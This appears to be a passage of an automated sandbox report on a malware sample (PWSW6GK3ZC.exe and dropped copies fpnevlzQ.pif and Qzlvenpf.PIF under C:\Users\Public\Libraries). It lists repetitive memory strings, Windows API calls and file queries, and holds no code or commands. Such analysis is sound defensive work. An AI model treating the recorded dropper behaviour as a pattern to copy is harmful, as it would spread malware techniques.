Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FBAC000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F3A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqx
Source: fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F3A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq@M~
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FBAC000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F3A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq\|
Source: fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FBAC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq$Y
Source: fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F3A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqDr
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FBAC000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F3A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq`
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqXXP.
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FBAC000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F3A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqd
Source: fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FBAC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqx#
Source: fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F3A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqLw
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FBAC000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F3A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqh
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqd>Q.
Source: fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F3A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq\~
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqp$R.
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FBAC000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F3A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjql
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq@fQ.
Source: fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F3A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq<a
Source: fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F3A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqpO
Source: fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FBAC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqhB
Source: fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FBAC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqH%
Source: fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F3A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqh>
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqPbR.
Source: fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FBAC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqX,
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqD\|Q.
Source: fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F3A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqX(
Source: fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FBAC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq,v
Source: fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F3A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqxE
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqtEN.
Source: fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F3A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqh/
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq,{O.
Source: fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F3A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq4v
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqx)S.
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq8aP.
Source: fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F3A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq,q
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqHQS.
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FBAC000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F3A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq0
Source: fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F3A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqHG
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FBAC000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F3A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq4
Source: fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F3A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqhd
Source: fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FBAC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq85
Source: fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F3A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqXN
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FBAC000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F3A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq8
Source: fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FBAC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqxp
Source: fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FBAC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqhZ
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FBAC000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F3A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq<
Source: fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F3A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqpZ~
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqddN.
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FBAC000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F3A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FBAC000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F3A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq$
Source: fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F3A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqPc~
Source: fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F3A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqP=
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FBAC000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F3A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq(ZS.
Source: fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FBAC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq)
Source: fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FBAC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqP6
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FBAC000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F3A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq(
Source: fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F3A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqV~
Source: fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FBAC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq&
Source: fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FBAC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq`I
Source: fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F3A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq0l~
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FBAC000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F3A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq,
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FBAC000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F3A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqP
Source: fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FBAC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqXy
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FBAC000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F3A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqT
Source: fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F3A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq@\
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqLrO.
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqliO.
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq<6R.
Source: fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F3A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq0F
Source: fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FBAC000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F3A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqX
Source: fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FBAC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqPh
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqxOP.
Source: fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FBAC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq@R
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FBAC000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F3A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq\
Source: fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F3A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq 3
Source: fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FBAC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq@U
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FBAC000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F3A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq@
Source: fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FBAC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq0?
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq<kR.
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FBAC000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F3A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqD
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F3A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager@\jq
Source: fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FBAC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq8D
Source: fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FBAC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq(.
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FBAC000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F3A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqH
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FBAC000.00000004.00000800.00020000.00000000.sdmp, fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F3A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqL
Source: fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FBAC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqHK
Source: fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F3A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqK
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqDQ.
Source: fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FBAC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq ^
Source: fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F3A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjql*
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq$8N.
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqT]Q.
Source: fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FBAC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq0q
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqHwP.
Source: fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FBAC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq(`
Source: fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FBAC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq8j
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqtTQ.
Source: fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FBAC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqt(
Source: fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F3A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq8f
Source: fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FBAC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq(T
Source: fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F3A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq(P
Source: fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FBAC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq C
Source: fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F3A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqHm
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq\-R.
Source: fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FBAC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqT1
Source: fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FBAC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqL
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq`CR.
Source: fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F3A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqd4
Source: fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F3A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq0{
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqD/N.
Source: fpnevlzQ.pif, 00000007.00000002.3387290898.000000002E113000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjqPGQ.
Source: fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F3A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjql9
Source: fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FBAC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq\|E
Source: fpnevlzQ.pif, 0000000A.00000002.3384637628.000000001FBAC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjql/
Source: fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F3A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq\|@
Source: fpnevlzQ.pif, 0000000D.00000002.3382807165.000000001F3A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLRjq e

Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	0_2_028A5510
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Code function: GetLocaleInfoA,	0_2_028AA130
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Code function: GetLocaleInfoA,	0_2_028AA17C
Source: C:\Users\user\Desktop\PWSW6GK3ZC.exe	Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	0_2_028A561C
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: GetLocaleInfoA,	7_2_00417A20
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	9_2_02AC5510
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Code function: GetLocaleInfoA,	9_2_02ACA17C
Source: C:\Users\Public\Libraries\Qzlvenpf.PIF	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	9_2_02AC561B
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Code function: GetLocaleInfoA,	10_2_00417A20

Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\fpnevlzQ.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
